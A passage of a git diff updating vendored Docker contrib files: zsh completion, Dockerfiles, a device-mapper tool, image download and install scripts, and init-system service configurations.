:->option-or-argument" && ret=0 - - case $state in - (command) - __docker_swarm_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_swarm_subcommand && ret=0 - ;; - esac - ;; - (system) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_system_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_system_subcommand && ret=0 - ;; - esac - ;; - (version) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 - ;; - (volume) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_volume_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_volume_subcommand && ret=0 - ;; - esac - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_commands" && ret=0 - ;; - esac - - return ret -} - -_docker() { - # Support for subservices, which allows for `compdef _docker docker-shell=_docker_containers`. - # Based on /usr/share/zsh/functions/Completion/Unix/_git without support for `ret`. - if [[ $service != docker ]]; then - _call_function - _$service - return - fi - - local curcontext="$curcontext" state line help="-h --help" - integer ret=1 - typeset -A opt_args - - _arguments $(__docker_arguments) -C \ - "(: -)"{-h,--help}"[Print usage]" \ - "($help)--config[Location of client config files]:path:_directories" \ - "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ - "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ - "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ - "($help)--tls[Use TLS]" \ - "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g "*.(pem|crt)"" \ - "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g "*.(pem|crt)"" \ - "($help)--tlskey=[Path to TLS key file]:Key file:_files -g "*.(pem|key)"" \ - "($help)--tlsverify[Use TLS and verify the remote]" \ - "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ - "($help -v --version)"{-v,--version}"[Print version information and quit]" \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - local host=${opt_args[-H]}${opt_args[--host]} - local config=${opt_args[--config]} - local docker_options="${host:+--host $host} ${config:+--config $config}" - - case $state in - (command) - __docker_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-$words[1]: - __docker_subcommand && ret=0 - ;; - esac - - return ret -} - -_dockerd() { - integer ret=1 - words[1]='daemon' - __docker_subcommand && ret=0 - return ret -} - -_docker "$@" - -# Local Variables: -# mode: Shell-Script -# sh-indentation: 4 -# indent-tabs-mode: nil -# sh-basic-offset: 4 -# End: -# vim: ft=zsh sw=4 ts=4 et diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile index 5cacd1f999..187281644f 100644 --- a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile @@ -22,7 +22,7 @@ # Base docker image FROM debian:jessie -MAINTAINER Jessica Frazelle +LABEL maintainer Jessica Frazelle # Install Chromium RUN apt-get update && apt-get install -y \ diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile index 3ddb23208d..8a9b646ee4 100644 --- a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile @@ -19,7 +19,7 @@ # Base docker image FROM debian:jessie -MAINTAINER Jessica Frazelle +LABEL maintainer Jessica Frazelle # Install Gparted and its dependencies RUN apt-get update && apt-get install -y \ diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go index 906d064df6..d3ec46a8b4 100644 --- a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go @@ -1,4 +1,4 @@ -// +build !windows,!solaris +// +build !windows package main @@ -11,9 +11,9 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver/devmapper" "github.com/docker/docker/pkg/devicemapper" + "github.com/sirupsen/logrus" ) func usage() { @@ -90,14 +90,12 @@ func main() { fmt.Printf("Sector size: %d\n", status.SectorSize) fmt.Printf("Data use: %d of %d (%.1f %%)\n", status.Data.Used, status.Data.Total, 100.0*float64(status.Data.Used)/float64(status.Data.Total)) fmt.Printf("Metadata use: %d of %d (%.1f %%)\n", status.Metadata.Used, status.Metadata.Total, 100.0*float64(status.Metadata.Used)/float64(status.Metadata.Total)) - break case "list": ids := devices.List() sort.Strings(ids) for _, id := range ids { fmt.Println(id) } - break case "device": if flag.NArg() < 2 { usage() @@ -113,7 +111,6 @@ func main() { fmt.Printf("Size in Sectors: %d\n", status.SizeInSectors) fmt.Printf("Mapped Sectors: %d\n", status.MappedSectors) fmt.Printf("Highest Mapped Sector: %d\n", status.HighestMappedSector) - break case "resize": if flag.NArg() < 2 { usage() @@ -131,7 +128,6 @@ func main() { os.Exit(1) } - break case "snap": if flag.NArg() < 3 { usage() @@ -142,7 +138,6 @@ func main() { fmt.Println("Can't create snap device: ", err) os.Exit(1) } - break case "remove": if flag.NArg() < 2 { usage() @@ -153,7 +148,6 @@ func main() { fmt.Println("Can't remove device: ", err) os.Exit(1) } - break case "mount": if flag.NArg() < 3 { usage() @@ -161,16 +155,13 @@ func main() { err := devices.MountDevice(args[1], args[2], "") if err != nil { - fmt.Println("Can't create snap device: ", err) + fmt.Println("Can't mount device: ", err) os.Exit(1) } - break default: fmt.Printf("Unknown command %s\n", args[0]) usage() os.Exit(1) } - - return } diff --git a/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh b/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh new file mode 100755 index 0000000000..860598943b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh @@ -0,0 +1,111 @@ +#!/usr/bin/env bash +# +# This script installs the bundle to Docker Machine instances, for the purpose +# of testing the latest Docker with Swarm mode enabled. +# Do not use in production. +# +# Requirements (on host to run this script) +# - bash is installed +# - Docker Machine is installed +# - GNU tar is installed +# +# Requirements (on Docker machine instances) +# - Docker can be managed via one of `systemctl`, `service`, or `/etc/init.d/docker` +# +set -e +set -o pipefail + +errexit() { + echo "$1" + exit 1 +} + +BUNDLE="bundles/$(cat VERSION)" + +bundle_files(){ + # prefer dynbinary if exists + for f in dockerd docker-proxy; do + if [ -d $BUNDLE/dynbinary-daemon ]; then + echo $BUNDLE/dynbinary-daemon/$f + else + echo $BUNDLE/binary-daemon/$f + fi + done + for f in docker-containerd docker-containerd-ctr docker-containerd-shim docker-init docker-runc; do + echo $BUNDLE/binary-daemon/$f + done + if [ -d $BUNDLE/dynbinary-client ]; then + echo $BUNDLE/dynbinary-client/docker + else + echo $BUNDLE/binary-client/docker + fi +} + +control_docker(){ + m=$1; op=$2 + # NOTE: `docker-machine ssh $m sh -c "foo bar"` does not work + # (but `docker-machine ssh $m sh -c "foo\ bar"` works) + # Anyway we avoid using `sh -c` here for avoiding confusion + cat < /dev/null; then + systemctl $op docker +elif command -v service > /dev/null; then + service docker $op +elif [ -x /etc/init.d/docker ]; then + /etc/init.d/docker $op +else + echo "not sure how to control the docker daemon" + exit 1 +fi +EOF +} + +detect_prefix(){ + m=$1 + script='dirname $(dirname $(which dockerd))' + echo $script | docker-machine ssh $m sh +} + +install_to(){ + m=$1; shift; files=$@ + echo "$m: detecting docker" + prefix=$(detect_prefix $m) + echo "$m: detected docker on $prefix" + echo "$m: stopping docker" + control_docker $m stop + echo "$m: installing docker" + # NOTE: GNU tar is required because we use --transform here + # TODO: compression (should not be default) + tar ch --transform 's/.*\///' $files | docker-machine ssh $m sudo tar Cx $prefix/bin + echo "$m: starting docker" + control_docker $m start + echo "$m: done" +} + +check_prereq(){ + command -v docker-machine > /dev/null || errexit "docker-machine not installed" + ( tar --version | grep GNU > /dev/null ) || errexit "GNU tar not installed" +} + +case "$1" in + "install") + shift; machines=$@ + check_prereq + files=$(bundle_files) + echo "Files to be installed:" + for f in $files; do echo $f; done + pids=() + for m in $machines; do + install_to $m $files & + pids+=($!) + done + status=0 + for pid in ${pids[@]}; do + wait $pid || { status=$?; echo "background process $pid failed with exit status $status"; } + done + exit $status + ;; + *) + errexit "Usage: $0 install MACHINES" + ;; +esac diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh index 29d7ff59fd..77c91d1f1b 100755 --- a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e # hello-world latest ef872312fe1b 3 months ago 910 B diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh index 111e3fa2ba..54b592307f 100755 --- a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh @@ -1,16 +1,19 @@ -#!/bin/bash -set -e +#!/usr/bin/env bash +set -eo pipefail # hello-world latest ef872312fe1b 3 months ago 910 B # hello-world latest ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9 3 months ago 910 B # debian latest f6fab3b798be 10 weeks ago 85.1 MB # debian latest f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd 10 weeks ago 85.1 MB - if ! command -v curl &> /dev/null; then echo >&2 'error: "curl" not found!' exit 1 fi +if ! command -v jq &> /dev/null; then + echo >&2 'error: "jq" not found!' + exit 1 +fi usage() { echo "usage: $0 dir image[:tag][@digest] ..." @@ -27,8 +30,158 @@ mkdir -p "$dir" # hacky workarounds for Bash 3 support (no associative arrays) images=() rm -f "$dir"/tags-*.tmp +manifestJsonEntries=() +doNotGenerateManifestJson= # repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."' +# bash v4 on Windows CI requires CRLF separator +newlineIFS=$'\n' +if [ "$(go env GOHOSTOS)" = 'windows' ]; then + major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1) + if [ "$major" -ge 4 ]; then + newlineIFS=$'\r\n' + fi +fi + +registryBase='https://registry-1.docker.io' +authBase='https://auth.docker.io' +authService='registry.docker.io' + +# https://github.com/moby/moby/issues/33700 +fetch_blob() { + local token="$1"; shift + local image="$1"; shift + local digest="$1"; shift + local targetFile="$1"; shift + local curlArgs=( "$@" ) + + local curlHeaders="$( + curl -S "${curlArgs[@]}" \ + -H "Authorization: Bearer $token" \ + "$registryBase/v2/$image/blobs/$digest" \ + -o "$targetFile" \ + -D- + )" + curlHeaders="$(echo "$curlHeaders" | tr -d '\r')" + if grep -qE "^HTTP/[0-9].[0-9] 3" <<<"$curlHeaders"; then + rm -f "$targetFile" + + local blobRedirect="$(echo "$curlHeaders" | awk -F ': ' 'tolower($1) == "location" { print $2; exit }')" + if [ -z "$blobRedirect" ]; then + echo >&2 "error: failed fetching '$image' blob '$digest'" + echo "$curlHeaders" | head -1 >&2 + return 1 + fi + + curl -fSL "${curlArgs[@]}" \ + "$blobRedirect" \ + -o "$targetFile" + fi +} + +# handle 'application/vnd.docker.distribution.manifest.v2+json' manifest +handle_single_manifest_v2() { + local manifestJson="$1"; shift + + local configDigest="$(echo "$manifestJson" | jq --raw-output '.config.digest')" + local imageId="${configDigest#*:}" # strip off "sha256:" + + local configFile="$imageId.json" + fetch_blob "$token" "$image" "$configDigest" "$dir/$configFile" -s + + local layersFs="$(echo "$manifestJson" | jq --raw-output --compact-output '.layers[]')" + local IFS="$newlineIFS" + local layers=( $layersFs ) + unset IFS + + echo "Downloading '$imageIdentifier' (${#layers[@]} layers)..." + local layerId= + local layerFiles=() + for i in "${!layers[@]}"; do + local layerMeta="${layers[$i]}" + + local layerMediaType="$(echo "$layerMeta" | jq --raw-output '.mediaType')" + local layerDigest="$(echo "$layerMeta" | jq --raw-output '.digest')" + + # save the previous layer's ID + local parentId="$layerId" + # create a new fake layer ID based on this layer's digest and the previous layer's fake ID + layerId="$(echo "$parentId"$'\n'"$layerDigest" | sha256sum | cut -d' ' -f1)" + # this accounts for the possibility that an image contains the same layer twice (and thus has a duplicate digest value) + + mkdir -p "$dir/$layerId" + echo '1.0' > "$dir/$layerId/VERSION" + + if [ ! -s "$dir/$layerId/json" ]; then + local parentJson="$(printf ', parent: "%s"' "$parentId")" + local addJson="$(printf '{ id: "%s"%s }' "$layerId" "${parentId:+$parentJson}")" + # this starter JSON is taken directly from Docker's own "docker save" output for unimportant layers + jq "$addJson + ." > "$dir/$layerId/json" <<-'EOJSON' + { + "created": "0001-01-01T00:00:00Z", + "container_config": { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": null, + "Image": "", + "Volumes": null, + "WorkingDir": "", + "Entrypoint": null, + "OnBuild": null, + "Labels": null + } + } + EOJSON + fi + + case "$layerMediaType" in + application/vnd.docker.image.rootfs.diff.tar.gzip) + local layerTar="$layerId/layer.tar" + layerFiles=( "${layerFiles[@]}" "$layerTar" ) + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$layerTar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${layerId:0:12}" + continue + fi + local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')" + fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress + ;; + + *) + echo >&2 "error: unknown layer mediaType ($imageIdentifier, $layerDigest): '$layerMediaType'" + exit 1 + ;; + esac + done + + # change "$imageId" to be the ID of the last layer we added (needed for old-style "repositories" file which is created later -- specifically for older Docker daemons) + imageId="$layerId" + + # munge the top layer image manifest to have the appropriate image configuration for older daemons + local imageOldConfig="$(jq --raw-output --compact-output '{ id: .id } + if .parent then { parent: .parent } else {} end' "$dir/$imageId/json")" + jq --raw-output "$imageOldConfig + del(.history, .rootfs)" "$dir/$configFile" > "$dir/$imageId/json" + + local manifestJsonEntry="$( + echo '{}' | jq --raw-output '. + { + Config: "'"$configFile"'", + RepoTags: ["'"${image#library\/}:$tag"'"], + Layers: '"$(echo '[]' | jq --raw-output ".$(for layerFile in "${layerFiles[@]}"; do echo " + [ \"$layerFile\" ]"; done)")"' + }' + )" + manifestJsonEntries=( "${manifestJsonEntries[@]}" "$manifestJsonEntry" ) +} + while [ $# -gt 0 ]; do imageTag="$1" shift @@ -44,30 +197,119 @@ while [ $# -gt 0 ]; do imageFile="${image//\//_}" # "/" can't be in filenames :) - token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" + token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')" - manifestJson="$(curl -sSL -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/manifests/$digest")" + manifestJson="$( + curl -fsSL \ + -H "Authorization: Bearer $token" \ + -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.list.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.v1+json' \ + "$registryBase/v2/$image/manifests/$digest" + )" if [ "${manifestJson:0:1}" != '{' ]; then echo >&2 "error: /v2/$image/manifests/$digest returned something unexpected:" echo >&2 " $manifestJson" exit 1 fi - layersFs=$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum') + imageIdentifier="$image:$tag@$digest" - IFS=$'\n' - # bash v4 on Windows CI requires CRLF separator - if [ "$(go env GOHOSTOS)" = 'windows' ]; then - major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1) - if [ "$major" -ge 4 ]; then - IFS=$'\r\n' - fi - fi - layers=( ${layersFs} ) - unset IFS + schemaVersion="$(echo "$manifestJson" | jq --raw-output '.schemaVersion')" + case "$schemaVersion" in + 2) + mediaType="$(echo "$manifestJson" | jq --raw-output '.mediaType')" + + case "$mediaType" in + application/vnd.docker.distribution.manifest.v2+json) + handle_single_manifest_v2 "$manifestJson" + ;; + application/vnd.docker.distribution.manifest.list.v2+json) + layersFs="$(echo "$manifestJson" | jq --raw-output --compact-output '.manifests[]')" + IFS="$newlineIFS" + layers=( $layersFs ) + unset IFS + + found="" + # parse first level multi-arch manifest + for i in "${!layers[@]}"; do + layerMeta="${layers[$i]}" + maniArch="$(echo "$layerMeta" | jq --raw-output '.platform.architecture')" + if [ "$maniArch" = "$(go env GOARCH)" ]; then + digest="$(echo "$layerMeta" | jq --raw-output '.digest')" + # get second level single manifest + submanifestJson="$( + curl -fsSL \ + -H "Authorization: Bearer $token" \ + -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.list.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.v1+json' \ + "$registryBase/v2/$image/manifests/$digest" + )" + handle_single_manifest_v2 "$submanifestJson" + found="found" + break + fi + done + if [ -z "$found" ]; then + echo >&2 "error: manifest for $maniArch is not found" + exit 1 + fi + ;; + *) + echo >&2 "error: unknown manifest mediaType ($imageIdentifier): '$mediaType'" + exit 1 + ;; + esac + ;; + + 1) + if [ -z "$doNotGenerateManifestJson" ]; then + echo >&2 "warning: '$imageIdentifier' uses schemaVersion '$schemaVersion'" + echo >&2 " this script cannot (currently) recreate the 'image config' to put in a 'manifest.json' (thus any schemaVersion 2+ images will be imported in the old way, and their 'docker history' will suffer)" + echo >&2 + doNotGenerateManifestJson=1 + fi + + layersFs="$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum')" + IFS="$newlineIFS" + layers=( $layersFs ) + unset IFS + + history="$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]')" + imageId="$(echo "$history" | jq --raw-output '.[0]' | jq --raw-output '.id')" - history=$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]') - imageId=$(echo "$history" | jq --raw-output .[0] | jq --raw-output .id) + echo "Downloading '$imageIdentifier' (${#layers[@]} layers)..." + for i in "${!layers[@]}"; do + imageJson="$(echo "$history" | jq --raw-output ".[${i}]")" + layerId="$(echo "$imageJson" | jq --raw-output '.id')" + imageLayer="${layers[$i]}" + + mkdir -p "$dir/$layerId" + echo '1.0' > "$dir/$layerId/VERSION" + + echo "$imageJson" > "$dir/$layerId/json" + + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$layerId/layer.tar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${layerId:0:12}" + continue + fi + token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')" + fetch_blob "$token" "$image" "$imageLayer" "$dir/$layerId/layer.tar" --progress + done + ;; + + *) + echo >&2 "error: unknown manifest schemaVersion ($imageIdentifier): '$schemaVersion'" + exit 1 + ;; + esac + + echo if [ -s "$dir/tags-$imageFile.tmp" ]; then echo -n ', ' >> "$dir/tags-$imageFile.tmp" @@ -75,30 +317,6 @@ while [ $# -gt 0 ]; do images=( "${images[@]}" "$image" ) fi echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp" - - echo "Downloading '${image}:${tag}@${digest}' (${#layers[@]} layers)..." - for i in "${!layers[@]}"; do - imageJson=$(echo "$history" | jq --raw-output .[${i}]) - imageId=$(echo "$imageJson" | jq --raw-output .id) - imageLayer=${layers[$i]} - - mkdir -p "$dir/$imageId" - echo '1.0' > "$dir/$imageId/VERSION" - - echo "$imageJson" > "$dir/$imageId/json" - - # TODO figure out why "-C -" doesn't work here - # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." - # "HTTP/1.1 416 Requested Range Not Satisfiable" - if [ -f "$dir/$imageId/layer.tar" ]; then - # TODO hackpatch for no -C support :'( - echo "skipping existing ${imageId:0:12}" - continue - fi - token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" - curl -SL --progress -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/blobs/$imageLayer" -o "$dir/$imageId/layer.tar" # -C - - done - echo done echo -n '{' > "$dir/repositories" @@ -116,6 +334,12 @@ echo -n $'\n}\n' >> "$dir/repositories" rm -f "$dir"/tags-*.tmp +if [ -z "$doNotGenerateManifestJson" ] && [ "${#manifestJsonEntries[@]}" -gt 0 ]; then + echo '[]' | jq --raw-output ".$(for entry in "${manifestJsonEntries[@]}"; do echo " + [ $entry ]"; done)" > "$dir/manifest.json" +else + rm -f "$dir/manifest.json" +fi + echo "Download of images into '$dir' complete." echo "Use something like the following to load the result into a Docker daemon:" echo " tar -cC '$dir' . | docker load" diff --git a/vendor/github.com/docker/docker/contrib/gitdm/domain-map b/vendor/github.com/docker/docker/contrib/gitdm/domain-map index 1f1849e4f6..17a287e97a 100644 --- a/vendor/github.com/docker/docker/contrib/gitdm/domain-map +++ b/vendor/github.com/docker/docker/contrib/gitdm/domain-map @@ -23,7 +23,14 @@ github@hollensbe.org Docker < 2015-01-01 github@hollensbe.org Cisco david.calavera@gmail.com Docker < 2016-04-01 -david.calavera@gmail.com Netlify +david.calavera@gmail.com (Unknown) + +madhu@socketplane.io Docker +ejhazlett@gmail.com Docker +ben@firshman.co.uk Docker + +vincent@sbr.pm (Unknown) < 2016-10-24 +vincent@sbr.pm Docker # # Others @@ -37,3 +44,4 @@ microsoft.com Microsoft redhat.com Red Hat mrunalp@gmail.com Red Hat +antonio.murdaca@gmail.com Red Hat diff --git a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh index dd6a564995..dfff5ff204 100755 --- a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh +++ b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # This script generates a gitdm compatible email aliases file from a git diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris deleted file mode 100644 index 3d0d691c17..0000000000 --- a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris +++ /dev/null @@ -1,4 +0,0 @@ -FROM solaris -EXPOSE 80/tcp -COPY httpserver . -CMD ["./httpserver"] diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd index 244403113e..89183de46b 100644 --- a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd @@ -1,8 +1,18 @@ # /etc/conf.d/docker: config file for /etc/init.d/docker # where the docker daemon output gets piped +# this contains both stdout and stderr. If you need to separate them, +# see the settings below #DOCKER_LOGFILE="/var/log/docker.log" +# where the docker daemon stdout gets piped +# if this is not set, DOCKER_LOGFILE is used +#DOCKER_OUTFILE="/var/log/docker-out.log" + +# where the docker daemon stderr gets piped +# if this is not set, DOCKER_LOGFILE is used +#DOCKER_ERRFILE="/var/log/docker-err.log" + # where docker's pid get stored #DOCKER_PIDFILE="/run/docker.pid" diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd index 5d3160338a..6c968f607e 100644 --- a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd @@ -6,8 +6,10 @@ command="${DOCKERD_BINARY:-/usr/bin/dockerd}" pidfile="${DOCKER_PIDFILE:-/run/${RC_SVCNAME}.pid}" command_args="-p \"${pidfile}\" ${DOCKER_OPTS}" DOCKER_LOGFILE="${DOCKER_LOGFILE:-/var/log/${RC_SVCNAME}.log}" +DOCKER_ERRFILE="${DOCKER_ERRFILE:-${DOCKER_LOGFILE}}" +DOCKER_OUTFILE="${DOCKER_OUTFILE:-${DOCKER_LOGFILE}}" start_stop_daemon_args="--background \ - --stderr \"${DOCKER_LOGFILE}\" --stdout \"${DOCKER_LOGFILE}\"" + --stderr \"${DOCKER_ERRFILE}\" --stdout \"${DOCKER_OUTFILE}\"" start_pre() { checkpath -f -m 0644 -o root:docker "$DOCKER_LOGFILE" diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service index 8bfed93c75..517463172b 100644 --- a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service @@ -1,7 +1,8 @@ [Unit] Description=Docker Application Container Engine Documentation=https://docs.docker.com -After=network.target docker.socket firewalld.service +After=network-online.target docker.socket firewalld.service +Wants=network-online.target Requires=docker.socket [Service] @@ -24,6 +25,10 @@ TimeoutStartSec=0 Delegate=yes # kill only the docker process, not all processes in the cgroup KillMode=process +# restart the docker process if it exits prematurely +Restart=on-failure +StartLimitBurst=3 +StartLimitInterval=60s [Install] WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm index 6e41892399..6c60646b56 100644 --- a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm @@ -1,7 +1,8 @@ [Unit] Description=Docker Application Container Engine Documentation=https://docs.docker.com -After=network.target firewalld.service +After=network-online.target firewalld.service +Wants=network-online.target [Service] Type=notify @@ -23,6 +24,10 @@ TimeoutStartSec=0 Delegate=yes # kill only the docker process, not all processes in the cgroup KillMode=process +# restart the docker process if it exits prematurely +Restart=on-failure +StartLimitBurst=3 +StartLimitInterval=60s [Install] WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker index 4f9d38dda5..9c8fa6be73 100755 --- a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker @@ -119,9 +119,13 @@ case "$1" in stop) check_init fail_unless_root - log_begin_msg "Stopping $DOCKER_DESC: $BASE" - start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 - log_end_msg $? + if [ -f "$DOCKER_SSD_PIDFILE" ]; then + log_begin_msg "Stopping $DOCKER_DESC: $BASE" + start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 + log_end_msg $? + else + log_warning_msg "Docker already stopped - file $DOCKER_SSD_PIDFILE not found." + fi ;; restart) diff --git a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh index 47cd35ce62..03180e435a 100755 --- a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh +++ b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh @@ -8,7 +8,7 @@ set -e } usage() { - printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository]\n' "$0" + printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository] [-a arch]\n' "$0" exit 1 } @@ -47,12 +47,12 @@ pack() { } save() { - [ $SAVE -eq 1 ] || return + [ $SAVE -eq 1 ] || return 0 tar --numeric-owner -C $ROOTFS -c . | xz > rootfs.tar.xz } -while getopts "hr:m:s" opt; do +while getopts "hr:m:sc:a:" opt; do case $opt in r) REL=$OPTARG @@ -64,7 +64,10 @@ while getopts "hr:m:s" opt; do SAVE=1 ;; c) - ADDITIONALREPO=community + ADDITIONALREPO=$OPTARG + ;; + a) + ARCH=$OPTARG ;; *) usage @@ -76,7 +79,7 @@ REL=${REL:-edge} MIRROR=${MIRROR:-http://nl.alpinelinux.org/alpine} SAVE=${SAVE:-0} MAINREPO=$MIRROR/$REL/main -ADDITIONALREPO=$MIRROR/$REL/community +ADDITIONALREPO=$MIRROR/$REL/${ADDITIONALREPO:-community} ARCH=${ARCH:-$(uname -m)} tmp diff --git a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh deleted file mode 100755 index b11a6bb265..0000000000 --- a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env bash -# Generate a very minimal filesystem based on busybox-static, -# and load it into the local docker under the name "busybox". - -echo >&2 -echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/busybox-static' -echo >&2 - -BUSYBOX=$(which busybox) -[ "$BUSYBOX" ] || { - echo "Sorry, I could not locate busybox." - echo "Try 'apt-get install busybox-static'?" - exit 1 -} - -set 